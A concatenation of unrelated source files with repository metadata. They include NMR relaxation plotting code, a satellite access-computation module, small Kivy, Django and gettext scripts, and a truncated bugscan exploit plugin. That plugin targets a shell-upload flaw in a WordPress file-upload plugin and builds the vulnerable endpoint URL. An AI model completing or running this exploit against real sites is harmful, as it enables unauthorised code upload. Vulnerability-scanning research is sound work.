    home_dir = "/home/karajan/uni/master/analyse/data/crn/data/T1/"
    t1dir = [
        home_dir + "t1_230K_280K.data",
        home_dir + "t1_280K_290K.data",
        home_dir + "t1_300K_310K.data",
        home_dir + "t1_310K_355K.data",
        home_dir + "t1_342K_380K.data",
        home_dir + "t1_360K_440K_170807.data",
        home_dir + "t1_270K_330K.data",
        home_dir + "t1_305K_345K.data",
        home_dir + "t1_305K_325K.data",
    ]
    for i, file_name in enumerate(t1dir):
        data = np.loadtxt(file_name)
        temp = data[:, 1]
        t1 = data[:, 3]
        t1_err = data[:, 4]
        # error propagation: d(1/t1) = t1_err / t1^2
        plt.errorbar(temp, 1 / t1, yerr=t1_err / t1**2, fmt='x')

    # home_dir = "/home/karajan/uni/master/analyse/data"
    # t1files = glob.glob(home_dir + "/*/T1/T1_*.data")
    # for file in t1files:
    #     data = np.loadtxt(file)
    #     temp = data[:, 1]
    #     t1 = data[:, 3]
    #     t1_err = data[:, 4]
    #     plt.errorbar(temp, 1 / t1, yerr=t1_err / t1**2, fmt='x')

    plt.xlim(200, 450)
    # save_plot presumably comes from the nmr_lib star import -- confirm
    save_plot(plt, "/home/karajan/uni/master/analyse/plots/T1/t1_neu")
# %%
def do_t1_bruker():
    """Plot 1/T1 vs. temperature, highlighting the Bruker spectrometer series.

    Overlays the Zuern reference, the own measurement series and the Bruker
    data set on one implicit pyplot figure and saves it. Side effects only.
    """
    plot_setup()
    plt.ylabel("1/$T_1$ [1/s]")
    plt.title("CRN $T_1$ Bruker")

    # Literature reference data (columns: temperature, T1)
    fn_extern ="/home/karajan/uni/master/analyse/data/crn/data/T1/t1-zuern.data"
    labels_extern = "Zürn T1"

    data = np.loadtxt(fn_extern)
    temp = data[:, 0]
    t1 = data[:, 1]
    # plot_data(temp, 1/t1, label=labels_extern[i], marker=".")
    plt.scatter(
        temp, 1 / t1, label=labels_extern, marker=".", color="tab:orange")

    # t1dir = "/home/jens/Documents/projekte/crn/data/T1"
    # for i, file_name in enumerate(sorted(glob.glob(t1dir + "/*.data"))):
    # Own measurement series, drawn without error bars as background context
    home_dir = "/home/karajan/uni/master/analyse/data/crn/data/T1/"
    t1dir = [
        home_dir + "t1_230K_280K.data",
        home_dir + "t1_280K_290K.data",
        home_dir + "t1_300K_310K.data",
        home_dir + "t1_310K_355K.data",
        home_dir + "t1_342K_380K.data",
        home_dir + "t1_360K_440K_170807.data",
        home_dir + "t1_270K_330K.data",
        home_dir + "t1_305K_345K.data",
        home_dir + "t1_305K_325K.data",
    ]
    for i, file_name in enumerate(t1dir):
        data = np.loadtxt(file_name)
        temp = data[:, 1]
        t1 = data[:, 3]
        t1_err = data[:, 4]
        plt.scatter(temp, 1 / t1, color="blue")

    # Bruker series with propagated error bars: d(1/t1) = t1_err / t1^2
    bruker_name="/home/karajan/uni/master/analyse/data/crn/data/T1/bruker_t1.data"
    bruker_data = np.loadtxt(bruker_name)
    bruker_temp = bruker_data[:, 1]
    bruker_t1 = bruker_data[:, 3]
    bruker_t1_err = bruker_data[:, 4]
    plt.errorbar(
        bruker_temp,
        1 / bruker_t1,
        yerr=bruker_t1_err / bruker_t1**2,
        fmt='s',
        color="red",
        label="Bruker")

    plt.xlim(220, 450)
    plt.ylim(30, 10**6)
    plt.legend(loc=2)
    # save_plot presumably comes from the nmr_lib star import -- confirm
    save_plot(plt, "/home/karajan/uni/master/analyse/plots/BRUKER/bruker_t1")

do_t1_bruker()
# %%
def do_bruker_beta():
    """Plot the stretching exponent beta of the T1 fits, highlighting the Bruker series.

    Own series are restricted to temperatures below 380 K; the Bruker data
    set is overlaid with error bars. Side effects only (pyplot + file save).
    """
    plot_setup()
    plt.yscale("linear")
    plt.ylabel("beta")
    plt.title("CRN Bruker $\\beta_{T_1}$")

    # Own measurement series (columns: ?, temperature, ..., beta, beta error)
    home_dir = "/home/karajan/uni/master/analyse/data/crn/data/T1/"
    t1dir = [
        home_dir + "t1_230K_280K.data",
        home_dir + "t1_280K_290K.data",
        home_dir + "t1_300K_310K.data",
        home_dir + "t1_310K_355K.data",
        home_dir + "t1_342K_380K.data",
        home_dir + "t1_360K_440K_170807.data",
        home_dir + "t1_270K_330K.data",
        home_dir + "t1_305K_345K.data",
        home_dir + "t1_305K_325K.data",
    ]
    for i, file_name in enumerate(t1dir):
        data = np.loadtxt(file_name)
        temp = data[:, 1]
        beta = data[:, 5]
        beta_err = data[:, 6]
        # keep only points below 380 K; filter beta before reassigning temp
        beta = beta[temp < 380]
        beta_err = beta_err[temp < 380]
        temp = temp[temp < 380]
        plt.errorbar(temp, beta, yerr=beta_err, fmt='x', color="tab:blue")

    # Bruker series with error bars
    bruker_name="/home/karajan/uni/master/analyse/data/crn/data/T1/bruker_t1.data"
    bruker_data = np.loadtxt(bruker_name)
    bruker_temp = bruker_data[:, 1]
    bruker_beta = bruker_data[:, 5]
    bruker_beta_err = bruker_data[:, 6]
    plt.errorbar(
        bruker_temp,
        bruker_beta,
        yerr=bruker_beta_err,
        fmt='s',
        color="red",
        label="Bruker")

    plt.legend(loc=3)
    # plt.ylim(0, 1.1)

    # home_dir = "/home/karajan/uni/master/analyse/data"
    # t1files = glob.glob(home_dir + "/*/T1/T1_*.data")
    # for file in t1files:
    #     data = np.loadtxt(file)
    #     temp = data[:, 1]
    #     beta = data[:, 5]
    #     beta_err = data[:, 6]
    #     plt.errorbar(temp, beta, yerr=beta_err, fmt='x')

    # save_plot presumably comes from the nmr_lib star import -- confirm
    save_plot(plt, "/home/karajan/uni/master/analyse/plots/BRUKER/bruker_t1beta")

do_bruker_beta()
# %%
def do_beta():
    """Plot the stretching exponent beta of the T1 fits for all own series.

    Points at or above 380 K are excluded. Side effects only (pyplot state
    plus a saved figure).
    """
    plot_setup()
    plt.yscale("linear")
    plt.ylabel("beta")
    plt.title("CRN $\\beta_{T_1}$")

    # t1dir = "/home/jens/Documents/projekte/crn/data/T1"
    # for i, file_name in enumerate(sorted(glob.glob(t1dir + "/*.data"))):
    # Own measurement series (columns: ?, temperature, ..., beta, beta error)
    home_dir = "/home/karajan/uni/master/analyse/data/crn/data/T1/"
    t1dir = [
        home_dir + "t1_230K_280K.data",
        home_dir + "t1_280K_290K.data",
        home_dir + "t1_300K_310K.data",
        home_dir + "t1_310K_355K.data",
        home_dir + "t1_342K_380K.data",
        home_dir + "t1_360K_440K_170807.data",
        home_dir + "t1_270K_330K.data",
        home_dir + "t1_305K_345K.data",
        home_dir + "t1_305K_325K.data",
    ]
    for i, file_name in enumerate(t1dir):
        data = np.loadtxt(file_name)
        temp = data[:, 1]
        beta = data[:, 5]
        beta_err = data[:, 6]
        # keep only points below 380 K; filter beta before reassigning temp
        beta = beta[temp < 380]
        beta_err = beta_err[temp < 380]
        temp = temp[temp < 380]
        plt.errorbar(temp, beta, yerr=beta_err, fmt='x')

    # plt.ylim(0, 1.1)

    # home_dir = "/home/karajan/uni/master/analyse/data"
    # t1files = glob.glob(home_dir + "/*/T1/T1_*.data")
    # for file in t1files:
    #     data = np.loadtxt(file)
    #     temp = data[:, 1]
    #     beta = data[:, 5]
    #     beta_err = data[:, 6]
    #     plt.errorbar(temp, beta, yerr=beta_err, fmt='x')

    # save_plot presumably comes from the nmr_lib star import -- confirm
    save_plot(plt, "/home/karajan/uni/master/analyse/plots/T1/t1_beta")
# do_t1()
# do_beta()
# plt.xlim(200, 500)
# plt.ylim(10**1, 10**6)
# save_plot("/home/jens/Documents/projekte/crn/170817/plots/t1_vergleich")
# %%
# do_t1_bruker()
do_bruker_beta()
# show_plot()
| [
"jens.adam@tu-dortmund.de"
] | jens.adam@tu-dortmund.de |
ae5fa2cf162831595429963b02bdc5cfc7fb8baf | 7e9daf6a2a3ebfb969e793f92afc0dc5f1c2fc35 | /venv/bin/pip | f925d1739221b77a3093bdff330b2aded4106b0b | [] | no_license | NARESHSWAMI199/5-Star-On-Hacker-Rank-Python | e43ce5cb3429d2a683c37e6f4ba6440d073d47c2 | 51f245d1d0966de21ddf861b22fe3379e7c8a0a7 | refs/heads/main | 2023-02-25T03:05:25.330205 | 2021-01-19T13:49:27 | 2021-01-19T13:49:27 | 325,296,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | #!/home/naresh/Documents/django/hrank/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
    # Auto-generated console-script shim: strip the setuptools
    # '-script.pyw' / '.exe' suffix from argv[0], then delegate to pip's
    # CLI and propagate its exit status.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"swaminaresh993@gmail.com"
] | swaminaresh993@gmail.com | |
1a17bc069625e3f341c7c83afad9089213f1170a | 7c027160909486e2904a5bb65e65628124d271b5 | /brahe/access/access.py | db870165ffb536ae0a00c9db886e0776997be3e0 | [
"MIT"
] | permissive | lirun-sat/brahe | 84df8f0c2c36d004fe028d5d2602edd737934f92 | 4a1746ef3c14211b0709de6e7e34b6f52fc0e686 | refs/heads/master | 2023-09-04T13:18:36.023992 | 2021-11-19T03:48:03 | 2021-11-19T03:48:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,531 | py | '''The access module provides functionality to compute access opportunities,
geometry, and boundaries under different constraints.
'''
import logging
import typing
import copy
import datetime
import math
import numpy as np
from brahe.constants import RAD2DEG
from brahe.epoch import Epoch
from brahe.tle import TLE
from brahe.coordinates import sECEFtoGEOD
from brahe.astro import orbital_period, sCARTtoOSC
import brahe.data_models as bdm
import brahe.utils as utils
from . import access_geometry as ageo
logger = logging.getLogger(__name__)
###############
# Constraints #
###############
def access_constraints(epc: Epoch, sat_ecef: np.ndarray, loc_ecef: np.ndarray,
                       constraints: bdm.AccessConstraints,
                       constraint_list: typing.List[str], **kwargs):
    '''Check if all access constraints are satisfied.

    Args:
        epc (:obj:`Epoch`): Epoch of geometric access
        sat_ecef (:obj:`np.ndarray`): Satellite ECEF state
        loc_ecef (:obj:`np.ndarray`): Location ECEF
        constraints (:obj:`AccessConstraints`): Constraint object
        constraint_list (List[str]): List of constraint names to apply. Each
            name ``<name>`` must correspond to a module-level function
            called ``<name>_constraint``.
        kwargs (dict): Accepts arbitrary keyword arguments which are
            forwarded to every constraint function (e.g. ``tile`` for the
            tile-direction constraint).

    Returns:
        bool: True if all constraints are satisfied.
    '''

    # all() short-circuits, so evaluation stops at the first violated
    # constraint instead of continuing to iterate over the remaining ones.
    return all(
        globals()[f'{field}_constraint'](epc, sat_ecef, loc_ecef, constraints, **kwargs)
        for field in constraint_list
    )
def look_direction_constraint(epc: Epoch, sat_ecef: np.ndarray,
                              loc_ecef: np.ndarray,
                              constraints: bdm.AccessConstraints, **kwargs):
    '''Look direction access constraint.

    Args:
        epc (:obj:`Epoch`): Epoch of access
        sat_ecef (:obj:`np.ndarray`): Satellite ECEF (ITRF) state
        loc_ecef (:obj:`np.ndarray`): Location ECEF (ITRF) state
        constraints (:obj:`AccessConstraints`): Constraint settings

    Returns:
        bool: True if constraint is satisfied (feasible) at given state and time.
    '''

    # Actual look direction of the satellite-to-location geometry
    actual = ageo.look_direction(sat_ecef, loc_ecef)

    # Feasible if either direction is accepted or the geometry matches the
    # required side
    required = constraints.look_direction
    return required == bdm.LookDirection.either or actual == required
def ascdsc_constraint(epc: Epoch, sat_ecef: np.ndarray,
                      loc_ecef: np.ndarray, constraints: bdm.AccessConstraints, **kwargs):
    '''Ascending/descending access constraint.

    Args:
        epc (:obj:`Epoch`): Epoch of access
        sat_ecef (:obj:`np.ndarray`): Satellite ECEF (ITRF) state
        loc_ecef (:obj:`np.ndarray`): Location ECEF (ITRF) state
        constraints (:obj:`AccessConstraints`): Constraint settings

    Returns:
        bool: True if constraint is satisfied (feasible) at given state and time.
    '''

    ascdsc = ageo.ascdsc(sat_ecef)

    # Feasible when either pass direction is allowed or the current pass
    # direction matches the required one
    return (constraints.ascdsc == bdm.AscendingDescending.either
            or ascdsc == constraints.ascdsc)
def look_angle_constraint(epc: Epoch, sat_ecef: np.ndarray,
                          loc_ecef: np.ndarray,
                          constraints: bdm.AccessConstraints, **kwargs):
    '''Look angle access constraint.

    Args:
        epc (:obj:`Epoch`): Epoch of access
        sat_ecef (:obj:`np.ndarray`): Satellite ECEF (ITRF) state
        loc_ecef (:obj:`np.ndarray`): Location ECEF (ITRF) state
        constraints (:obj:`AccessConstraints`): Constraint settings

    Returns:
        bool: True if constraint is satisfied (feasible) at given state and time.
    '''

    # Satellite-to-location look angle in degrees
    angle = ageo.look_angle(sat_ecef, loc_ecef, use_degrees=True)

    # Feasible only inside the configured [min, max] window
    return constraints.look_angle_min <= angle <= constraints.look_angle_max
def elevation_constraint(epc: Epoch, sat_ecef: np.ndarray,
                         loc_ecef: np.ndarray,
                         constraints: bdm.AccessConstraints, **kwargs):
    '''Elevation constraint.

    Args:
        epc (:obj:`Epoch`): Epoch of access
        sat_ecef (:obj:`np.ndarray`): Satellite ECEF (ITRF) state
        loc_ecef (:obj:`np.ndarray`): Location ECEF (ITRF) state
        constraints (:obj:`AccessConstraints`): Constraint settings

    Returns:
        bool: True if constraint is satisfied (feasible) at given state and time.
    '''

    # Only the elevation of the azimuth/elevation/range geometry is needed
    _, elevation, _ = ageo.azelrng(sat_ecef, loc_ecef, use_degrees=True)

    # Feasible only inside the configured [min, max] elevation window
    return constraints.elevation_min <= elevation <= constraints.elevation_max
def tile_direction_constraint(epc: Epoch,
                              sat_ecef: np.ndarray,
                              loc_ecef: np.ndarray,
                              constraints: bdm.AccessConstraints,
                              tile: bdm.Tile = None,
                              max_alignment_deviation: float = 10,
                              **kwargs):
    '''Tile direction access constraint. Limits access to satellites
    aligned with tile direction.

    Args:
        epc (:obj:`Epoch`): Epoch of access
        sat_ecef (:obj:`np.ndarray`): Satellite ECEF (ITRF) state. Must
            contain position and velocity (at least 6 elements).
        loc_ecef (:obj:`np.ndarray`): Location ECEF (ITRF) state
        constraints (:obj:`AccessConstraints`): Constraint settings
        tile (:obj:`Tile`): Tile associated with collect
        max_alignment_deviation (float): Maximum deviation [deg] between the
            satellite ground-track direction and the tile direction.

    Returns:
        bool: True if constraint is satisfied (feasible) at given state and time.

    Raises:
        RuntimeError: If `sat_ecef` has fewer than 6 elements or `tile` is
            not provided.
    '''

    if len(sat_ecef) < 6:
        raise RuntimeError(
            f'Invalid input length of {len(sat_ecef)}. Must be at least length 6.'
        )

    if not tile:
        raise RuntimeError(f'Missing expected keyword argument "tile"')

    # Unit vector from Earth's center to the satellite (local radial direction)
    sat_pnt = np.asarray(sat_ecef[0:3])
    sat_pnt = sat_pnt / np.linalg.norm(sat_pnt)

    # Normalize satellite velocity and tile direction vectors
    sat_dir = np.asarray(sat_ecef[3:6])
    tile_dir = np.asarray(tile.tile_direction)
    sat_dir = sat_dir / np.linalg.norm(sat_dir)
    tile_dir = tile_dir / np.linalg.norm(tile_dir)

    # Remove component of satellite velocity normal to Earth's surface.
    # Bug fix: subtract the radial projection (v.n)n -- the previous code
    # subtracted the bare scalar dot product from every component.
    sat_dir = sat_dir - np.dot(sat_dir, sat_pnt) * sat_pnt
    sat_dir = sat_dir / np.linalg.norm(sat_dir)

    # Compute alignment of satellite ground-track direction and tile
    # direction. Clamp the dot product to [-1, 1] so floating-point
    # round-off cannot push it outside the domain of acos.
    alignment_vector = float(np.clip(np.dot(sat_dir, tile_dir), -1.0, 1.0))
    alignment_angle = math.acos(alignment_vector) * RAD2DEG

    return alignment_angle < max_alignment_deviation
# ######################
# # Access Computation #
# ######################
def find_geometric_constraint_boundary(tle: TLE,
                                       center_ecef: np.ndarray,
                                       constraints: bdm.AccessConstraints,
                                       constraint_list: typing.List[str],
                                       epc0: Epoch,
                                       timestep: float = 1.0,
                                       tol: float = 0.001,
                                       **kwargs) -> Epoch:
    '''Locate the next transition of the access-constraint status (visible
    to not-visible, or vice versa) by stepped search with recursive
    bisection refinement.
    Args:
        tle (:obj:`TLE`): TLE object.
        center_ecef (np.ndarray): Center location to compute access constraints with respect to.
        constraints (:obj:`AccessConstraints`): Access constraint properties.
        constraint_list (List[str]): Names of constraint functions applied to check for access.
        epc0 (:obj:`Epoch`): Epoch the search starts from.
        timestep (float): Step size for the search; negative values search backwards.
        tol (float): Time tolerance for constraint boundaries.
        kwargs (dict): Keyword arguments forwarded to the constraint functions.
    Returns:
        Epoch: Time boundary (Epoch)
    '''
    # Base case: the step has been halved down below the tolerance.
    if math.fabs(timestep) < tol:
        return epc0
    # Walk forward (or backward) in fixed steps until the visibility
    # status flips relative to the starting epoch.
    t = copy.deepcopy(epc0)
    state = tle.state_itrf(t)
    status = access_constraints(t, state, center_ecef, constraints, constraint_list, **kwargs)
    while access_constraints(t, state, center_ecef, constraints, constraint_list, **kwargs) == status:
        t += timestep
        state = tle.state_itrf(t)
    # Reverse direction with half the step (never smaller than tol/2) and
    # recurse to tighten the bracket around the transition.
    refined_step = -np.sign(timestep) * max(math.fabs(timestep) / 2.0, tol / 2.0)
    return find_geometric_constraint_boundary(tle, center_ecef, constraints,
                constraint_list, t, timestep=refined_step, tol=tol, **kwargs)
def compute_access_properties(tle: TLE, center_ecef: np.ndarray,
                              t_start: Epoch, t_end: Epoch):
    '''Compute access properties of Contact or Collect.
    Args:
        tle (:obj:`TLE`): TLE object
        center_ecef (np.ndarray): Center location to compute access constraints with respect to.
        t_start (:obj:`Epoch`): Start of access window
        t_end (:obj:`Epoch`): End of access window
    Returns:
        AccessProperties: Geometric properties of access
    '''
    # Satellite ITRF states at window midtime, open, and close
    t_mid = t_start + (t_end - t_start) / 2.0
    x_mid = tle.state_itrf(t_mid)
    x_open = tle.state_itrf(t_start)
    x_close = tle.state_itrf(t_end)
    props = bdm.AccessProperties()
    # General geometry at window midtime
    props.ascdsc = ageo.ascdsc(x_mid)
    props.look_direction = ageo.look_direction(x_mid, center_ecef)
    # Azimuth at window open/close
    props.azimuth_open = ageo.azimuth(x_open, center_ecef)
    props.azimuth_close = ageo.azimuth(x_close, center_ecef)
    # NOTE: Assumes that maximal values for look angle and elevation occur
    # at either the start, end, or midtime. Values rounded to 6 places.
    props.elevation_min = round(min(ageo.elevation(x_open, center_ecef),
                                    ageo.elevation(x_close, center_ecef)), 6)
    props.elevation_max = round(ageo.elevation(x_mid, center_ecef), 6)
    props.look_angle_min = round(ageo.look_angle(x_mid, center_ecef), 6)
    props.look_angle_max = round(max(ageo.look_angle(x_open, center_ecef),
                                     ageo.look_angle(x_close, center_ecef)), 6)
    # Unit line-of-sight vectors (satellite -> center) at open and close
    los_open = center_ecef - x_open[0:3]
    props.los_start = (los_open / np.linalg.norm(los_open)).tolist()
    los_close = center_ecef - x_close[0:3]
    props.los_end = (los_close / np.linalg.norm(los_close)).tolist()
    return props
def find_location_accesses(spacecraft: bdm.Spacecraft, geojson: bdm.GeoJSONObject,
                           t_start: Epoch, t_end: Epoch,
                           timestep: float = 120.0, tol: float = 1e-3,
                           orbit_fraction: float = 0.75, **kwargs):
    '''Find all opportunities for accesses over the period `t_start` to `t_end`.
    Accepts either `Station` or `Tile` as primary inputs and returns `Contact`
    or `Collect` respectively.
    Args:
        spacecraft (:obj:`Spacecraft`): Spacecraft object.
        geojson (:obj:`Union[Station, Tile]`): Location object with center_point for access. Tile or Station
        t_start (:obj:`Epoch`): Start of window for access computation. GPS Time.
        t_end (:obj:`Epoch`): End of window for access computation. GPS Time.
        timestep (float, Default: 120): timestep for search
        tol (float, Default: 1e-3): Time tolerance for constraint boundaries.
        orbit_fraction (float, Default: 0.75): Fraction of orbital period to advance search after finding an access.
        request (:obj:`Request`): Request. Only required if input GeoJSON is `Tile`
        kwargs (dict): Accepts keyword arguments passed to constraint function.
    Returns:
        List[Union[Contact, Collect]]: `Contact` or `Collect` opportunities.
    Raises:
        ValueError: If geojson is neither a Tile nor a Station, or if a Tile
            is given without a `request` keyword argument.
    '''
    opportunities = []
    # Assert time types as epochs
    t_start = Epoch(t_start, time_system='UTC')
    t_end = Epoch(t_end, time_system='UTC')
    # Dispatch on the concrete geojson type exactly once, instead of
    # repeating the same type check throughout the function.
    is_tile = type(geojson) == bdm.Tile
    request = None
    if is_tile:
        # Tiles derive their constraints from the associated Request, which
        # must be supplied as a keyword argument.
        request = kwargs.get('request', None)
        if not request:
            raise ValueError(f'Missing kwarg "request"')
        constraints = request.constraints
        constraint_list = ['look_direction', 'ascdsc', 'look_angle', 'elevation', 'tile_direction']
        kwargs['tile'] = geojson
    elif type(geojson) == bdm.Station:
        constraints = geojson.constraints
        constraint_list = ['elevation']
    else:
        raise ValueError(f'Cannot compute access for geojson input of type {type(geojson)}. Must be Tile or GroundStation.')
    # Auxiliary values forwarded to the constraint functions
    kwargs['spacecraft_id'] = spacecraft.id
    # Set start time as initial Epoch
    epc = copy.deepcopy(t_start)
    # SGP TLE Propagator
    tle = spacecraft.tle
    # Orbital period, used to skip ahead after each found access
    T = orbital_period(sCARTtoOSC(tle.state_gcrf(t_start), use_degrees=True)[0])
    while epc < t_end:
        # Compute satellite state in pseudo-earth-fixed frame
        x_ecef = tle.state_itrf(epc)
        if access_constraints(epc, x_ecef, geojson.center_ecef, constraints, constraint_list, **kwargs):
            # Bracket the access window: search backwards for the start
            # (AOS) and forwards for the end (LOS) from the feasible epoch.
            collect_ts = find_geometric_constraint_boundary(tle, geojson.center_ecef,
                constraints, constraint_list, epc, timestep=-timestep, tol=tol, **kwargs
            )
            collect_te = find_geometric_constraint_boundary(tle, geojson.center_ecef,
                constraints, constraint_list, epc, timestep=timestep, tol=tol, **kwargs
            )
            if is_tile:
                # Center a fixed-duration collect inside the geometric window
                collect_tm = collect_ts + (collect_te - collect_ts)/2.0
                collect_ts = collect_tm - request.properties.collect_duration/2.0
                collect_te = collect_tm + request.properties.collect_duration/2.0
            # Compute Opportunity Properties
            access_properties = compute_access_properties(tle, geojson.center_ecef, collect_ts, collect_te)
            # Create opportunity object
            if is_tile:
                opportunity = bdm.Collect(
                    center=geojson.center.tolist(),
                    center_ecef=geojson.center_ecef.tolist(),
                    t_start=collect_ts.to_datetime(tsys='UTC'),
                    t_end=collect_te.to_datetime(tsys='UTC'),
                    spacecraft_id=spacecraft.id,
                    access_properties=access_properties,
                    tile_id=geojson.tile_id,
                    tile_group_id=geojson.tile_group_id,
                    request_id=request.request_id,
                )
            else:
                opportunity = bdm.Contact(
                    center=geojson.center.tolist(),
                    center_ecef=geojson.center_ecef.tolist(),
                    t_start=collect_ts.to_datetime(tsys='UTC'),
                    t_end=collect_te.to_datetime(tsys='UTC'),
                    spacecraft_id=spacecraft.id,
                    access_properties=access_properties,
                    station_id=geojson.station_id,
                    station_name=geojson.station_name,
                )
            opportunities.append(opportunity)
            # Step a fraction of an orbit to avoid re-detecting the same pass
            epc += orbit_fraction * T
        else:
            epc += timestep
    return opportunities
| [
"duncan.eddy@gmail.com"
] | duncan.eddy@gmail.com |
8da334eb44c9ea9052929ef18f09fca3bede6dbe | 65348a4305d10b88c3b4e34eb00d66cf5db6aba7 | /main.py | 225446846dea7cdde0668e429d65088b5214d266 | [] | no_license | lailacampos/Simple-GUI-Kivy | a3671b9dd7f39c6b1efb3c0521753a8a99f32fa8 | 19b0ed9ff7ad4039d842b2d4223a7d79ffb56dc2 | refs/heads/main | 2023-08-22T03:08:48.696503 | 2021-09-22T02:19:27 | 2021-09-22T02:19:27 | 407,191,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | # Useful links:
# https://kivy.org/doc/stable/guide/basic.html#quickstart
# https://kivy.org/doc/stable/api-kivy.app.html
# https://youtu.be/YDp73WjNISc
from kivy.app import App
from kivy.uix.label import Label
# The MyApp() class is derived from the App() class of the kivy.app package.
# The App() class is the base for creating Kivy applications.
# Kivy requires that the class inherits from the App class
class MyApp(App):
    """Minimal Kivy application that displays a single 'Hello World' label."""

    def build(self):
        """Create and return the root widget added to the window.

        Kivy invokes build() automatically from App.run(); user code does
        not need to call it directly.
        """
        return Label(text="Hello World")
# Start the Kivy event loop only when executed as a script (not on import).
if __name__ == "__main__":
    MyApp().run()
| [
"enders.game1990@gmail.com"
] | enders.game1990@gmail.com |
105ea887fde8976e0371b1515151cd874df939cd | 39dc5f1ffa71ad5e7aab5e92bb118bddf3ddae44 | /ats/users/urls.py | 63a22a7046e3bb8a9decd34439b0530732abd1fc | [
"MIT"
] | permissive | MahmoudFarid/ats | 14422a136c574d33745ac874e02e2211cce8bf14 | 1f882168cba2f34451cbb9bba1e37ce93ef0c465 | refs/heads/master | 2023-08-28T09:08:49.860168 | 2020-07-28T20:35:00 | 2020-07-28T20:35:00 | 278,744,279 | 0 | 0 | MIT | 2021-11-12T15:22:34 | 2020-07-10T22:23:07 | Python | UTF-8 | Python | false | false | 358 | py | from django.urls import path
from ats.users.views import (
user_detail_view,
user_redirect_view,
user_update_view,
)
# Namespace used when reversing these routes, e.g. reverse("users:detail").
app_name = "users"
urlpatterns = [
    path("~redirect/", view=user_redirect_view, name="redirect"),
    path("~update/", view=user_update_view, name="update"),
    # Catch-all: user detail pages are addressed by email.
    path("<str:email>/", view=user_detail_view, name="detail"),
]
| [
"mahmoud.farid.94@gmail.com"
] | mahmoud.farid.94@gmail.com |
eaaa81b1408518c00362eba85a5c786b9f3f4508 | 50fd4227fb802d65ae6620a3859dd992cb650717 | /po/update-po.py | d6e63063ddfa505286036b1b146456bf5bf3dbe7 | [
"Zlib"
] | permissive | danpla/dpscreenocr | 626c8004a388289589fa254b8b8916b8a3ada50a | 00ef775dae03e6de74bc07cfd04a0918febc8e30 | refs/heads/master | 2023-08-16T07:01:34.946170 | 2023-08-15T19:13:28 | 2023-08-15T19:13:28 | 173,785,193 | 193 | 19 | Zlib | 2020-05-29T19:56:53 | 2019-03-04T16:55:10 | C++ | UTF-8 | Python | false | false | 2,386 | py | #!/usr/bin/env python3
import glob
import os
import shutil
import subprocess
import sys
# Passed to xgettext as the gettext package name.
APP_NAME = 'dpScreenOCR'
# Base name of the generated template (<name>.pot) and the desktop entry.
APP_FILE_NAME = 'dpscreenocr'
# Passed to xgettext as --msgid-bugs-address.
BUGS_ADDRESS = 'https://github.com/danpla/dpscreenocr/issues'
def check_min_version(tool_path, min_version):
    """Exit with an error if the tool at tool_path is older than min_version.

    The tool is invoked with -V and is expected to print GNU gettext style
    version info on the first line, e.g.:
        xgettext (GNU gettext-tools) 0.21.1
    """
    version_info = subprocess.check_output(
        (tool_path, '-V'), text=True).splitlines()[0]
    # Version info from GNU gettext tools looks like:
    # xgettext (GNU gettext-tools) 0.21.1
    version = version_info.rpartition(' ')[2]
    if any(not s.isdigit() for s in version.split('.')):
        sys.exit(
            'Unexpected {} version info string format \"{}\"'.format(
                tool_path, version_info))

    # BUGFIX: compare versions numerically, component by component. The
    # original plain string comparison is wrong for versions such as
    # "0.9" vs "0.19" ("0.9" > "0.19" lexicographically, but 9 < 19).
    def as_tuple(v):
        return tuple(int(s) for s in v.split('.'))

    if as_tuple(version) < as_tuple(min_version):
        sys.exit(
            '{} version {} is less than {}'.format(
                tool_path, version, min_version))
def main():
    """Regenerate the .pot template and merge it into every .po catalog."""
    xgettext = shutil.which('xgettext')
    if not xgettext:
        sys.exit('xgettext not found')
    # Desktop-entry extraction needs xgettext >= 0.19; msgmerge can be of
    # any version.
    check_min_version(xgettext, "0.19")
    msgmerge = shutil.which('msgmerge')
    if not msgmerge:
        sys.exit('msgmerge not found')
    pot = APP_FILE_NAME + '.pot'
    # Extract translatable strings from the sources listed in POTFILES.in.
    subprocess.check_call((
        xgettext,
        '--files-from=POTFILES.in',
        '--from-code=UTF-8',
        '--add-comments=Translators:',
        '--package-name=' + APP_NAME,
        '--msgid-bugs-address=' + BUGS_ADDRESS,
        '--directory=..',
        '--output=' + pot,
        '-k_',
        '-kN_'))
    # The desktop entry is handled separately rather than listed in
    # POTFILES.in so the default keyword list — which includes the
    # untranslatable "Name" key — can be disabled.
    subprocess.check_call((
        xgettext,
        '--from-code=UTF-8',
        '--omit-header',
        '--join-existing',
        '--directory=..',
        '--output=' + pot,
        '-k',  # Disable default keywords
        '-kComment',
        os.path.join('data', APP_FILE_NAME + '.desktop')))
    # Merge the refreshed template into every translation catalog.
    for po in glob.glob('*.po'):
        subprocess.check_call((
            msgmerge,
            '--quiet',
            '--update',
            '--no-fuzzy-matching',
            '--backup=off',
            po,
            pot))
# Allow running directly: python update-po.py (from the po/ directory).
if __name__ == '__main__':
    main()
| [
"daniel.plakhotich@gmail.com"
] | daniel.plakhotich@gmail.com |
6b7b060513cf603782ed5bf499c61bedf4ab8776 | 43ff15a7989576712d0e51f0ed32e3a4510273c0 | /tools/pocs/bugscan/exp_602.py | 9d51ac6e5eea714832eab404bedc4db5c96a7b00 | [] | no_license | v1cker/kekescan | f2b51d91a9d6496e2cdc767eb6a600171f513449 | 3daa1775648439ba9e0003a376f90b601820290e | refs/heads/master | 2020-09-19T16:26:56.522453 | 2017-06-15T02:55:24 | 2017-06-15T02:55:24 | 94,495,007 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,189 | py | # -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'tyq'
# Name: Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability
# Refer: https://www.bugscan.net/#!/x/21599
def assign(service, arg):
    """Only handle WordPress targets: return (True, arg) for them, None otherwise."""
    return (True, arg) if service == "wordpress" else None
def audit(arg):
    # Proof-of-concept check for the publicly disclosed file-upload issue in
    # the "Work the Flow" plugin's bundled jQuery-File-Upload endpoint.
    path = "/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php"
    payload = arg + path
